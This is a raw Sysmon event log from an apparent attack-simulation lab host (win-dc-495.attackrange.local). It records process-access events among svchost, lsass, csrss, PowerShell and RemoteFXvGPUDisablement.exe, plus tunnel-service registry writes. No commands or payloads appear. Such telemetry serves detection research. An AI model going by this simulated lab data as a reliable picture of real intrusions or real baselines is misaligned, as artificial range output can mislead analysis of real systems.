13:33:59.158{59A5CD1D-8E47-6005-1C00-00000000A301}21642280C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.158{59A5CD1D-8E47-6005-1A00-00000000A301}21482276C:\Windows\system32\conhost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.127{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.127{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.111{59A5CD1D-8E46-6005-1100-00000000A301}1172644C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.096{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.096{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.049{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.049{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1A00-00000000A301}2148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.033{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.033{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.018{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:59.018{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.986{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.986{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
